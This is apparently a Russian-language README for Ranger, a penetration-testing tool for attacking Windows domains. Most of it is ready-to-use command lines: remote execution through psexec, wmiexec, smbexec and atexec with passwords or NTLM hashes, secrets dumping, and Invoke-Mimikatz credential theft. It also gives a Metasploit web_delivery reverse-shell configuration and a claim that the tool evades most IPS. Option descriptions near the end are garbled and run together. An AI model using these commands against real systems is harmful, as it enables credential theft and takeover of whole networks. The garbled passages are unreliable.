
Инструмент для специалистов по безопасности для доступа и взаимодействия с удаленными системами на базе Microsoft Windows.
Инструмент для поддержки специалистов по безопасности при доступе и взаимодействии с удаленными системами на базе Microsoft Windows.
Этот проект был задуман с мыслью: мы не изобрели лук или стрелу, а лишь нашли более эффективный способ их использования.
Ranger — это инструмент для атак и тестирования на проникновение, управляемый из командной строки, который может использовать инстанциированный сервер-катапульту для доставки возможностей против систем Windows. Пока у пользователя есть набор учетных данных или хэшей (NTLM, LM, LM:NTLM), он или она может получить доступ к системам, входящим в доверенную зону.
Используя эту возможность, специалист по безопасности может извлекать учетные данные из памяти в открытом виде, получать доступ к таблицам SAM, выполнять команды, запускать скрипты PowerShell, двоичные файлы Windows и другие инструменты. В настоящее время инструмент обходит большинство решений IPS от вендоров, если только они не были специально настроены для его обнаружения. Инструмент был разработан с использованием наших домашних лабораторий для поддержки специалистов по безопасности, выполняющих законные и/или контрактные действия.
Добавляется всё больше функциональности, но на данный момент инструмент использует вклады сообщества из репозиториев, связанных с командами PowerShell PowerView, PowerShell Mimikatz и Impacket.
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh
ranger --update
--scout
--secrets-dump
--wmiexec
--psexec
--smbexec
--atexec
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump
ranger.py --invoker -q -v -vv -vvv
ranger.py --downloader -q -v -vv -vvv
ranger.py --executor -q -v -vv -vvv
--get-domain-membership--domain, который позволяет вам указать другой домен, отличный от того, в который вы вошлиranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
-d, это будет означать, что вы хотите игнорировать все доменные имена в файле.password
LM:NTLM
:NTLM
PWDUMP
-t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xmlt в командах на e.-e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml-f-a-f и -a, если вы хотите изменить команду; чтобы избежать использования -a, вы можете использовать Executor-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x.-f.-a, если это требуется инструменту.-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"use exploit/multi/script/web_delivery
set targets 2
set payload <choose your desired payload>
set lhost <your IP>
set lport <port for the shell make sure it is not a conflicting port>
set URIPATH /
set SRVPORT <the same as what is set by the -r option in ranger, defaults to 8888>
exploit -j
Я получаю ошибки отказа в доступе на машинах Windows, которые являются частью WORKGROUP.
Если система не входит в домен, Windows по умолчанию не имеет административных общих ресурсов. SMBEXEC полагается на включенные общие ресурсы. Кроме того, WMIC не включен на машинах WORKGROUP. SMBEXEC и WMIEXEC предназначены для атак на протоколы, включенные на доменных системах. Хотя включить эти функции на системе WORKGROUP, безусловно, возможно, имейте в виду, что вы внедряете уязвимые протоколы (в конце концов, именно для атаки на них и создан этот инструмент). Включать эти функции на вашем основном домашнем компьютере, который ваша вторая половинка использует для Facebook, вероятно, не лучшая идея.
enum4linux, а затем использовать аргумент --share share_name в ranger, чтобы попытаться выполнить SMBEXEC.https://pypi.python.org/pypi/colorama[BSides Charm City 2016: April 23, 2016] (http://2016.bsidescharm.com/2016-talks/ranger-it-just-takes-one-account-to-take-down-an-enterprise)
[Video] (https://youtu.be/HrXTrPzdR2Q?list=PL0YXeUocWA4NAGPmYdKNmQEh8H6iL_4Ik)
[Black Arch Linux] (https://blackarch.org/)